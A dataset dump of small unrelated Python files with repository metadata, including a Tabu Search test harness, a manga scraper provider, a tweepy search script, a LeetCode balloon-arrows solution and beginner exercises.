222685f51ec56d50a935508b87c66af2db694e28 | 396f93d8e73c419ef82a94174815a2cecbb8334b | /.history/tester2_20200322005203.py | dc127637a831840c9f18cc1ca90688e8540b41dc | [] | no_license | mirfarzam/ArtificialIntelligence-HeuristicAlgorithm-TabuSearch | 8c73d9448b916009c9431526864a4441fdeb682a | 90b2dca920c85cddd7c1b3335344ac7b10a9b061 | refs/heads/master | 2021-03-26T21:16:42.561068 | 2020-04-17T21:44:26 | 2020-04-17T21:44:26 | 247,750,502 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,014 | py | import os
import subprocess
import re
from datetime import datetime
import time
from statistics import mean
# ---- Experiment configuration -------------------------------------------
numberOfTests = 1000
tabuIteration = '1000'   # passed to the executable as argv, hence strings
tabuDuration = '10'
numberOfCities = '50'

final_solution = []   # best tour length reported by each run
list_coverage = []    # iteration at which each run converged
local_minimum = []    # solutions of runs that reported a local minimum

print(f"\n\nTest for Tabu Search with this config: \n\tIterations : {tabuIteration} \n\tDuration(Tabu Memory): {tabuDuration} \n\tNumber of Cities: {numberOfCities}")
for i in range(0, numberOfTests):
    process = subprocess.Popen(['./algo_tabou.exe', tabuIteration , tabuDuration, numberOfCities, 'distances_entre_villes_{}.txt'.format(numberOfCities)],stdout=subprocess.PIPE,stderr=subprocess.PIPE)
    stdout, stderr = process.communicate()
    result = stdout
    # Collapse all whitespace so the regexes below work on one long line.
    result = re.sub(r'\s', ' ', str(result))
    # The last "<distance> km" figure printed is the run's best solution.
    solution = (re.findall(r'([0-9]{4,7}) km', result))[-1]
    final_solution.append(int(solution))
    coverage = re.findall(r'On est dans un minimum local a l\'iteration ([0-9]+) ->', result)
    if coverage != []:
        coverage = int(coverage[0])+ 1
        local_minimum.append(int(solution))
    else:
        # No local-minimum message: the run used every iteration.
        coverage = int(tabuIteration)
    number_of_solution_before_coverage = coverage
    list_coverage.append(coverage)
    print('best found solution is {} and found in interation {}, number of solutions before coverage : {}'.format(solution, coverage, number_of_solution_before_coverage))
    time.sleep( 1 )

print("Summary:")
# 5644 is the tour length this script treats as the global optimum.
optimum_result = len(list(filter(lambda x: x == 5644, final_solution)))
print(f'number of optimum solution found is {optimum_result}, so in {numberOfTests} runs of test we faced {(optimum_result/numberOfTests)*100}% coverage')
# Fixed: the "best case" figure previously reused max(list_coverage);
# the best (earliest) convergence is the minimum.
print(f'in average this test shows that we found the global optimum solution in iteration {mean(list_coverage)}\nand in worst we found it in iteration {max(list_coverage)} \nand in best case in iteration {min(list_coverage)}')
# NOTE(review): this sums convergence iterations, but the label says
# "cities visited" — confirm the intended metric.
print(f'Totally, {sum(list_coverage)} cities visited before finding the global optimum in {numberOfTests} runs of this test\n\n\n')
print(f'') | [
"farzam.mirmoeini@gmail.com"
] | farzam.mirmoeini@gmail.com |
f3e047c6d5a259010568b73807716e530bc4005d | 3481023b43028c5ee9520a8be0978e914bdcb548 | /manga_py/providers/mang_as.py | 27238087ebc8dca9f1a40bcd29d161ac214b695c | [
"MIT"
] | permissive | manga-py/manga-py | 18f6818d8efc96c3e69efee7dff3f3d6c773e32a | 0db97123acab1f2fb99e808b0ba54db08977e5c8 | refs/heads/stable_1.x | 2023-08-20T03:04:06.373108 | 2023-04-16T08:28:15 | 2023-04-16T08:28:15 | 98,638,892 | 444 | 56 | MIT | 2023-07-27T13:21:40 | 2017-07-28T10:27:43 | Python | UTF-8 | Python | false | false | 1,185 | py | from sys import stderr
from manga_py.provider import Provider
from .helpers.std import Std
class MangAs(Provider, Std):
    """Provider for the mang.as manga site."""

    def get_chapter_index(self) -> str:
        """Chapter slug from the URL, with dots normalized to dashes."""
        chapter_slug = self.re.search('/manga/[^/]+/([^/]+)', self.chapter).group(1)
        return chapter_slug.replace('.', '-')

    def get_content(self):
        return self._get_content('{}/manga/{}')

    def get_manga_name(self) -> str:
        return self._get_name('/manga/([^/]+)')

    def get_chapters(self):
        return self._elements('.chapter-title-rtl > a')

    def get_files(self):
        """Image URLs for the current chapter, parsed from the page script."""
        page = self.http_get(self.chapter)
        self.http().referer = self.chapter
        match = self.re.search(r'var\s+pages\s*=\s*(\[.+\])', page)
        if match is None:
            self.log('Images not found!', file=stderr)
            return []
        normalize = self.normalize_uri
        pages = self.json.loads(match.group(1))
        return [normalize(meta.get('page_image')) for meta in pages]

    def prepare_cookies(self):
        self._base_cookies(self.get_url())

    def get_cover(self) -> str:
        return self._cover_from_content('.boxed > img.img-responsive')

    def book_meta(self) -> dict:
        pass


main = MangAs
| [
"sttv-pc@mail.ru"
] | sttv-pc@mail.ru |
00d37ef5a44949f4d28a68655229c1733d6e2627 | da687718aa8ce62974090af63d25e057262e9dfe | /cap08-numeros/03_random.py | db2785183561b4bbf0cdc15b8b4c5a6a79ce731f | [] | no_license | frclasso/revisao_Python_modulo1 | 77928fa4409c97d49cc7deccdf291f44c337d290 | 1e83d0ef9657440db46a8e84b136ac5f9a7c556e | refs/heads/master | 2020-06-25T05:37:28.768343 | 2019-07-27T22:23:58 | 2019-07-27T22:23:58 | 199,217,969 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 589 | py | #!/usr/bin/env python3
# import the random module
import random

# random numbers
print(random.random()) # prints a float in [0.0, 1.0)
decider = random.randrange(2) # 0 OR 1
if decider == 0:
    print('HEADS')
else:
    print('TAILS')
# NOTE(review): the f-prefix is pointless here (no placeholders); print just
# receives two positional arguments.
print(f'Decider is:', decider)
print("You rolled a " + str(random.randrange(1, 7)))
# 6 distinct numbers sampled from the range 0..60 (lottery-style draw)
megaSena = random.sample(range(61), 6)
print(megaSena)

# random choices
possiblePets = ['cat', 'dog', 'fish']
print(random.choice(possiblePets))
cards = ['Jack', 'Queen', 'Ace', 'King']
# shuffle reorders the list in place
random.shuffle(cards)
print(cards) | [
"frcalsso@yahoo.com.br"
] | frcalsso@yahoo.com.br |
02c87dfe25889db419238131737049196a75d3fd | f36999827ad651b5ff2fd4b20d7c0245d5f30cfe | /twi_search_sht_01.py | 7912ed0564577b9c68a69549a85199199c5ca20f | [] | no_license | axuaxu/twi-src | cbcfe6891539d568c9ecece0db531984d7552094 | 3347c7d4ebd94c3399a7427427745fa73fe8463e | refs/heads/master | 2021-07-11T09:07:58.013503 | 2017-10-15T17:15:10 | 2017-10-15T17:15:10 | 105,077,369 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,568 | py | import tweepy
from credentials import *
import sys
#import jsonpickle
import os
import codecs
import datetime
import json
# App-only (OAuth 2) authentication — no user context is needed for search.
auth = tweepy.AppAuthHandler(consumer_key, consumer_secret)
#auth.set_access_token(access_token, access_token_secret)
# Let tweepy sleep through rate-limit windows instead of raising.
api = tweepy.API(auth, wait_on_rate_limit=True,
                 wait_on_rate_limit_notify=True)
# NOTE(review): tweepy.API(...) always returns an object, so this guard
# can never fire; auth failures surface later, on the first API call.
if (not api):
    print ("Can't Authenticate")
    sys.exit(-1)
def TwiShort(out,shtFile):
    """Intended to extract retweet counts from a dump file into shtFile.

    NOTE(review): currently broken and only referenced from commented-out
    code.  `twi` is a plain text line read from the file, so
    `twi._json.retweet_count` raises AttributeError on the first
    iteration.  Both file handles are also never closed.
    """
    outF = open(out,'r')
    sFile = open(shtFile,'w')
    print shtFile
    for twi in outF:
        # BUG: `twi` is a str line, not a tweepy Status object.
        shtStr = twi._json.retweet_count
        print shtStr
        sFile.write(shtStr)
def TwiSearch(que,fName,sinceId,max_id):
searchQuery = que
# this is what we're searching for
maxTweets = 10000000 # Some arbitrary large number
tweetsPerQry = 100 # this is the max the API permits
# We'll store the tweets in a text file.
# If results from a specific ID onwards are reqd, set since_id to that ID.
# else default to no lower limit, go as far back as API allows
# If results only below a specific ID are, set max_id to that ID.
# else default to no upper limit, start from the most recent tweet matching the search query.
tweetCount = 0
print("Downloading max {0} tweets".format(maxTweets))
with open(fName, 'w') as f:
while tweetCount < maxTweets:
try:
if (max_id <= 0):
if (not sinceId):
new_tweets = api.search(q=searchQuery, count=tweetsPerQry)
else:
new_tweets = api.search(q=searchQuery, count=tweetsPerQry,
since_id=sinceId)
else:
if (not sinceId):
new_tweets = api.search(q=searchQuery, count=tweetsPerQry,
max_id=str(max_id - 1))
else:
new_tweets = api.search(q=searchQuery, count=tweetsPerQry,
max_id=str(max_id - 1),
since_id=sinceId)
if not new_tweets:
print("No more tweets found")
break
for tweet in new_tweets:
# f.write(jsonpickle.encode(tweet._json, unpicklable=False) +
# '\n')
f.write(str(tweet._json)+'\n')
print "\nid "+str(tweet._json['id'])
print "\nretwi "+str(tweet._json['retweet_count'])
fav = tweet._json.favorite_count
tweetCount += len(new_tweets)
print("\nDownloaded {0} tweets".format(tweetCount))
max_id = new_tweets[-1].id
except tweepy.TweepError as e:
# Just exit if any error
print("some error : " + str(e))
break
print ("Downloaded {0} tweets, Saved to {1}".format(tweetCount, fName))
logStr = "Downloaded {0} tweets, Saved to {1}".format(tweetCount, fName)
return logStr
#print "\nshortFile"+shtFile
#pass
#que = '#georgiaokeeffe'
#outName = 'tweets-01.txt'
# ---- one-off run configuration -------------------------------------------
sinceId = None  # no lower tweet-id bound
max_id = -1L  # negative -> start from the newest tweets (Python 2 long)
#TwiSearch(que,outName,sinceId,max_id)
# Timestamp makes per-run output file names filesystem-safe (no ':' / ' ').
now = datetime.datetime.now()
timestr = str(now).replace(' ','-').replace(':','-')
#print str(now)+'\n'+timestr+'\n'+timestr[:19]
twi = "twi_query_list.txt"  # input: one search query per line
#fout = codecs.open(out,"w",encoding="utf-8")
ftwi = codecs.open(twi,'r',encoding="utf-8")
count = 100  # NOTE(review): unused
cdir = '.\\status-query'  # output directory (Windows-style paths)
srcDown = '.\\status-query-down'  # NOTE(review): unused in this script
logFile = cdir+'\\log-que-'+timestr[:16]+'.txt'
logStr = ""
#maxid = 9999999999999999999
shtFile=""
# Pass 1: run every query through TwiSearch and accumulate a textual log.
for que in ftwi:
    #maxid = getMaxID(que,cdir,srcDown,sinceId,max_id)
    #print "twi_id:"+twi_id+" maxid:"+str(maxid)
    out = cdir+'\\que-'+que+'-'+timestr[:16]+'.txt'
    out = out.replace('\r\n','')  # query lines keep their newline; strip it
    print "\ninput: "+ que+"\noutput: "+out
    logStr = logStr+"\ninput: "+ que+"\noutput: "+out
    logStr = logStr+TwiSearch(que,out,sinceId,max_id)
logF = open(logFile,'w')
logF.write(logStr)
# Pass 2: recompute the per-query output names; the retweet-count
# extraction via TwiShort is currently disabled (see its NOTE above it).
twi = "twi_query_list.txt"
#fout = codecs.open(out,"w",encoding="utf-8")
ftwi = codecs.open(twi,'r',encoding="utf-8")
for que in ftwi:
    out = cdir+'\\que-'+que+'-'+timestr[:16]+'.txt'
    out = out.replace('\r\n','')
    shtFile = out.replace('que-','sht-que-')
    #tShort = TwiShort(out,shtFile)
    #fout = codecs.open(out,"w",encoding="utf-8")
    #fout.write(tstatus)
| [
"axu0110@gmail.com"
] | axu0110@gmail.com |
f7793911f3d5f2ab90020e6656f60bbb34963128 | 9f594f95fabf672df31c451ef758f1dd979d20e4 | /agsci/seo/__init__.py | 208daa14b09f51282fb42de2b027d9d6443ba431 | [] | no_license | tsimkins/agsci.seo | 0d37fea8f8a736a5109e050bbb82e90e4233a0a3 | 39b31b5df21961cbd278851dc3a53f71937fa84a | refs/heads/master | 2020-12-30T10:36:47.454391 | 2018-06-18T14:52:43 | 2018-06-18T14:52:43 | 26,601,072 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,160 | py | from Products.CMFCore.utils import getToolByName
from Products.PythonScripts.Utility import allow_module
from zope.i18nmessageid import MessageFactory
from DateTime import DateTime
# i18n message factory for this add-on's translation domain.
seoMessageFactory = MessageFactory('agsci.seo')
# Allow through-the-web Python Scripts to import from the agsci.seo package.
allow_module('agsci.seo')
# Portal content types to skip (FacultyStaffDirectory, PloneFormGen,
# Relations, etc.).  NOTE(review): the consumer of this list lives outside
# this chunk — exact semantics (excluded from SEO fields? from indexing?)
# should be confirmed there.
exclude_types = [
    'Cardinality Constraint',
    'Content Reference',
    'FSDCommittee',
    'FSDCommitteeMembership',
    'FSDCommitteesFolder',
    'FSDCourse',
    'FSDDepartment',
    'FSDDepartmentalMembership',
    'FSDFacultyStaffDirectoryTool',
    'FSDPersonGrouping',
    'FSDSpecialtiesFolder',
    'FSDSpecialty',
    'FSDSpecialtyInformation',
    'FieldsetEnd',
    'FieldsetFolder',
    'FieldsetStart',
    'FormBooleanField',
    'FormConfirmationPage',
    'FormMailerAdapter',
    'FormMultiSelectionField',
    'FormRichLabelField',
    'FormSaveDataAdapter',
    'FormSelectionField',
    'FormStringField',
    'FormTextField',
    'FormThanksPage',
    'Interface Constraint',
    'Inverse Implicator',
    'Link',
    'Newsletter',
    'Relations Library',
    'Ruleset Collection',
    'Ruleset',
    'TalkEvent',
    'Type Constraint',
]
def initialize(context):
    """Zope 2 product initialization hook; nothing to register for this add-on."""
    pass
"trs22@psu.edu"
] | trs22@psu.edu |
20e5c44e7c4bffe2d3c42c00cb01c58c6a6f4c9f | d886bbef4caafefc1796e77d41d7c7fdddbb4794 | /mb/__init__.py | 22b50fb108b7696e26f4c3bf7d0d376a66a26c1f | [] | no_license | coryshain/pyModelBlocks | 4864a23e4e8452340797fdbc60338ad5e579d14f | ba25bf5d5279962675763f3c30b6452dbae15d25 | refs/heads/master | 2020-08-26T21:30:55.126202 | 2019-11-11T21:12:38 | 2019-11-11T21:12:38 | 217,154,233 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 417 | py | from mb.util.general import *
from mb.core.general.core import *
from mb.core.general.text import *
from mb.core.general.table import *
from mb.core.general.tree import *
from mb.core.parsing.core import *
from mb.core.regression import *
from mb.core.regression.lmer import *
from mb.core.regression.cdr import *
from mb.external_resources.ptb import *
from mb.external_resources.natstor import *
| [
"cory.shain@gmail.com"
] | cory.shain@gmail.com |
f9216e0b85abadad6d47ea519c87ced608c69d2a | 897802abf4ee5c7267de3eb5e321cc931898e2f6 | /python/python/songTian/part0_base/week02/c231_z_draw/__init__.py | 3186d069bc19e4cc6cb986cd688cddf78bfa3f9b | [] | no_license | aojie654/codes_store | 0527c7a7729b472e8fd2fd67af462cf857970633 | ed71b6266b2d2b5ddefadcb958f17695fb9db6cf | refs/heads/master | 2021-07-15T17:04:33.591673 | 2021-07-03T14:42:30 | 2021-07-03T14:42:30 | 132,343,733 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 234 | py | import turtle
# turtle.left(45)
# Draw three connected segments (a zigzag), starting left of the origin
# so the figure is roughly centered on screen.
turtle.penup()
turtle.bk(200)
turtle.pendown()
turtle.fd(150)
turtle.right(135)
turtle.fd(300)
turtle.left(135)
turtle.fd(150)
# Lift the pen and draw a detached circle above and to the right.
turtle.penup()
turtle.goto(100,150)
turtle.pendown()
turtle.circle(50,360)  # radius 50, full 360-degree arc
"aojie654@live.cn"
] | aojie654@live.cn |
f09ddbf128cad3f9efabae34ddc77bf3a77764f0 | 078918048099dfa2454cfac2d449ea3d77fbec55 | /452-minimum-number-of-arrows-to-burst-balloons.py | 370660e7078631a2893e6cedf203d00f19083f7a | [] | no_license | DmitryVlaznev/leetcode | 931784dcc4b465eebda7d22311f5bf5fa879f068 | b2a2afdfc725330545c9a2869fefc7d45ec594bc | refs/heads/master | 2023-06-10T05:42:34.992220 | 2023-06-05T09:54:10 | 2023-06-05T09:54:30 | 241,064,389 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,594 | py | # 452. Minimum Number of Arrows to Burst Balloons
# There are some spherical balloons spread in two-dimensional space. For
# each balloon, provided input is the start and end coordinates of the
# horizontal diameter. Since it's horizontal, y-coordinates don't
# matter, and hence the x-coordinates of start and end of the diameter
# suffice. The start is always smaller than the end.
# An arrow can be shot up exactly vertically from different points along
# the x-axis. A balloon with xstart and xend bursts by an arrow shot at
# x if xstart ≤ x ≤ xend. There is no limit to the number of arrows that
# can be shot. An arrow once shot keeps traveling up infinitely.
# Given an array points where points[i] = [xstart, xend], return the
# minimum number of arrows that must be shot to burst all balloons.
# Example 1:
# Input: points = [[10,16],[2,8],[1,6],[7,12]]
# Output: 2
# Explanation: One way is to shoot one arrow for example at x = 6 (bursting the balloons [2,8] and [1,6]) and another arrow at x = 11 (bursting the other two balloons).
# Example 2:
# Input: points = [[1,2],[3,4],[5,6],[7,8]]
# Output: 4
# Example 3:
# Input: points = [[1,2],[2,3],[3,4],[4,5]]
# Output: 2
# Example 4:
# Input: points = [[1,2]]
# Output: 1
# Example 5:
# Input: points = [[2,3],[2,3]]
# Output: 1
# Constraints:
# 0 <= points.length <= 104
# points.length == 2
# -231 <= xstart < xend <= 231 - 1
from typing import List
from utils import checkValue
class Solution:
    def findMinArrowShots(self, points: List[List[int]]) -> int:
        """Return the minimum number of arrows needed to burst all balloons.

        Greedy sweep: order balloons by start coordinate (ties: wider
        balloon first, matching the original comparator) and track the
        right edge of the running intersection; whenever the next balloon
        starts past that edge, it needs a fresh arrow.

        Fixes vs. the previous version: no longer reorders the caller's
        list (uses sorted()) nor mutates its inner [start, end] pairs,
        and replaces the functools.cmp_to_key comparator with a sort key.

        Args:
            points: list of [start, end] balloon diameters.

        Returns:
            Minimum arrow count (0 for an empty input).
        """
        if not points:
            return 0
        # Equivalent ordering to the old comparator: start asc, end desc.
        ordered = sorted(points, key=lambda p: (p[0], -p[1]))
        arrows = 1
        reach = ordered[0][1]  # right edge of the current shared interval
        for start, end in ordered[1:]:
            if start <= reach:
                # Balloon overlaps the current arrow position: shrink the
                # shared interval's right edge.
                reach = min(reach, end)
            else:
                # No overlap: this balloon needs a new arrow.
                arrows += 1
                reach = end
        return arrows
# Smoke tests; checkValue (project-local utils module) compares the
# expected value against the computed one.
t = Solution()
checkValue(2 , t.findMinArrowShots([[10,16],[2,8],[1,6],[7,12]]))
checkValue(4 , t.findMinArrowShots([[1,2],[3,4],[5,6],[7,8]]))
checkValue(2 , t.findMinArrowShots([[1,2],[2,3],[3,4],[4,5]]))
checkValue(1 , t.findMinArrowShots([[1,2]]))
checkValue(0 , t.findMinArrowShots([]))
checkValue(1 , t.findMinArrowShots([[2,3],[2,3]])) | [
"dmitry.vlaznev@datadvance.net"
] | dmitry.vlaznev@datadvance.net |
e85356b804f2734ce5dbfaf2d8f1d7ce277df17f | 78743e6b4f07a466d9b43e462f2d687443bf8538 | /phkit/english/__init__.py | 3ad48a32dab7797f62fdaa4cf8cbdc65b881d773 | [
"MIT"
] | permissive | tomguluson92/phkit | 9bac08019cc9f742ac82fa24a51e33448bb735da | ff6cd9114aa8a3737c05f0d4bba5d4da766770a0 | refs/heads/master | 2022-10-04T19:13:03.829071 | 2020-06-01T03:10:59 | 2020-06-01T03:10:59 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,789 | py | """
## english
from https://github.com/keithito/tacotron "
Cleaners are transformations that run over the input text at both training and eval time.
Cleaners can be selected by passing a comma-delimited list of cleaner names as the "cleaners"
hyperparameter. Some cleaners are English-specific. You'll typically want to use:
1. "english_cleaners" for English text
2. "transliteration_cleaners" for non-English text that can be transliterated to ASCII using
the Unidecode library (https://pypi.python.org/pypi/Unidecode)
3. "basic_cleaners" if you do not want to transliterate (in this case, you should also update
the symbols in symbols.py to match your data).
"""
import re
import random
from . import cleaners
from .symbols import symbols
# Mappings from symbol to numeric ID and vice versa:
_symbol_to_id = {s: i for i, s in enumerate(symbols)}
_id_to_symbol = {i: s for i, s in enumerate(symbols)}
# Regular expression matching text enclosed in curly braces
# (non-greedy groups so only the first {...} span is captured per match):
_curly_re = re.compile(r'(.*?)\{(.+?)\}(.*)')
def get_arpabet(word, dictionary):
    """Return *word* wrapped as a curly-braced ARPAbet token if known.

    Uses the first pronunciation the dictionary offers; falls back to the
    original word when the lookup finds nothing.
    """
    pronunciations = dictionary.lookup(word)
    if pronunciations is None:
        return word
    return "{" + pronunciations[0] + "}"
def text_to_sequence(text, cleaner_names, dictionary=None, p_arpabet=1.0):
    '''Converts a string of text to a sequence of IDs corresponding to the symbols in the text.
    The text can optionally have ARPAbet sequences enclosed in curly braces embedded
    in it. For example, "Turn left on {HH AW1 S S T AH0 N} Street."
    Args:
      text: string to convert to a sequence
      cleaner_names: names of the cleaner functions to run the text through
      dictionary: arpabet class with arpabet dictionary
      p_arpabet: per-word probability of substituting the ARPAbet form
    Returns:
      List of integers corresponding to the symbols in the text
    '''
    sequence = []
    space = _symbols_to_sequence(' ')
    # Check for curly braces and treat their contents as ARPAbet:
    while len(text):
        m = _curly_re.match(text)
        if not m:
            # No (more) braces: clean the remaining text and encode it.
            clean_text = _clean_text(text, cleaner_names)
            if dictionary is not None:
                # Randomly swap each word for its ARPAbet form with
                # probability p_arpabet.
                clean_text = [get_arpabet(w, dictionary)
                              if random.random() < p_arpabet else w
                              for w in clean_text.split(" ")]
                for i in range(len(clean_text)):
                    t = clean_text[i]
                    if t.startswith("{"):
                        # Strip the braces and encode as ARPAbet symbols.
                        sequence += _arpabet_to_sequence(t[1:-1])
                    else:
                        sequence += _symbols_to_sequence(t)
                    sequence += space
            else:
                sequence += _symbols_to_sequence(clean_text)
            break
        # NOTE(review): this assignment is dead — its result is never used
        # before the two lines below recompute what they need.
        clean_text = _clean_text(text, cleaner_names)
        sequence += _symbols_to_sequence(_clean_text(m.group(1), cleaner_names))
        sequence += _arpabet_to_sequence(m.group(2))
        text = m.group(3)
    # remove trailing space
    # NOTE(review): raises IndexError when `text` was empty (sequence == []).
    sequence = sequence[:-1] if sequence[-1] == space[0] else sequence
    return sequence
def sequence_to_text(sequence):
    '''Converts a sequence of IDs back to a string'''
    pieces = []
    for sym_id in sequence:
        symbol = _id_to_symbol.get(sym_id)
        if symbol is None:
            # Unknown IDs are silently skipped, as before.
            continue
        # ARPAbet symbols are stored with an '@' prefix; re-wrap them in
        # curly braces for display.
        if len(symbol) > 1 and symbol.startswith('@'):
            symbol = '{%s}' % symbol[1:]
        pieces.append(symbol)
    # Adjacent ARPAbet tokens render as '}{'; separate them with a space.
    return ''.join(pieces).replace('}{', ' ')
def _clean_text(text, cleaner_names):
    """Run *text* through each named cleaner from the cleaners module, in order.

    Raises:
        Exception: if a name does not correspond to a cleaner function.
    """
    for name in cleaner_names:
        # FIX: pass a default to getattr — without it a missing cleaner
        # raised AttributeError from getattr itself, so the descriptive
        # 'Unknown cleaner' error below was unreachable.
        cleaner = getattr(cleaners, name, None)
        if not cleaner:
            raise Exception('Unknown cleaner: %s' % name)
        text = cleaner(text)
    return text
def _symbols_to_sequence(symbols):
    """Map each keepable symbol to its numeric ID, dropping the rest."""
    ids = []
    for sym in symbols:
        if _should_keep_symbol(sym):
            ids.append(_symbol_to_id[sym])
    return ids
def _arpabet_to_sequence(text):
    """Encode whitespace-separated ARPAbet tokens (stored with '@' prefix)."""
    prefixed = ['@' + token for token in text.split()]
    return _symbols_to_sequence(prefixed)
def _should_keep_symbol(s):
    """True for symbols that map to an ID, excluding '_' and '~'."""
    # FIX: use '!=' instead of 'is not' — identity comparison against str
    # literals is implementation-dependent (and a SyntaxWarning on
    # CPython 3.8+); equality is what was intended.
    return s in _symbol_to_id and s != '_' and s != '~'
| [
"kqhyj@163.com"
] | kqhyj@163.com |
283beabf89838afcd66883c346c7a93bfba3840a | 89cd8b77ad5171c336cc60b2133fe6468a6cb53f | /Module01_CZ/day6_data_structure/04-代码/day6/102_元组.py | 2a44d5053791d093d0eafa1f4fa309c5bf6d9cd2 | [
"MIT"
] | permissive | fenglihanxiao/Python | 75178f6b6b0c53345e1ed54226ea645216572d6c | 872baf3a3a5ee42740161152605ca2b1ddf4cd30 | refs/heads/master | 2021-05-23T18:49:20.656433 | 2020-04-29T01:06:21 | 2020-04-29T01:06:21 | 253,199,073 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 254 | py | """
Demonstrate tuples: construction, single-element syntax, immutability, iteration.
"""
tuple1 = (1,2,3,"itcast","黑马程序员",True,False)
print(tuple1)
tuple2 = (100,)  # the trailing comma is what makes this a tuple
print(tuple2)
# tuple3 = ("itcast") # not a tuple: parentheses alone are just grouping
# print(type(tuple3))
# print(tuple1[4])
# tuple1[4] = "heima"  # would raise TypeError: tuples are immutable
for data in tuple1:
    print(data)
"fenglihanxiao@qq.com"
] | fenglihanxiao@qq.com |
9b371d5b80d4dc46d3a0bcdd75543261fb3c344c | 29d09c634ffdd8cab13631d62bc6e3ad00df49bf | /Algorithm/swexpert/1234_비밀번호.py | d93923dd1ba591415e9c6fd6a7dc893fdd765f2b | [] | no_license | kim-taewoo/TIL_PUBLIC | f1d32c3b4f46344c1c99f02e95cc6d2a888a0374 | ae86b542f8b1805b5dd103576d6538e3b1f5b9f4 | refs/heads/master | 2021-09-12T04:22:52.219301 | 2021-08-28T16:14:11 | 2021-08-28T16:14:11 | 237,408,159 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 428 | py | T = 10
for t in range(1, T+1):
n, s = input().split()
n = int(n)
s = list(s)
while True:
flag = False
i = 1
while i < n:
if s[i-1] == s[i]:
flag = True
s = s[:i-1] + s[i+1:]
n -= 2
else:
i += 1
if not flag:
break
result = "".join(s)
print("#{} {}".format(t, result)) | [
"acoustic0419@gmail.com"
] | acoustic0419@gmail.com |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.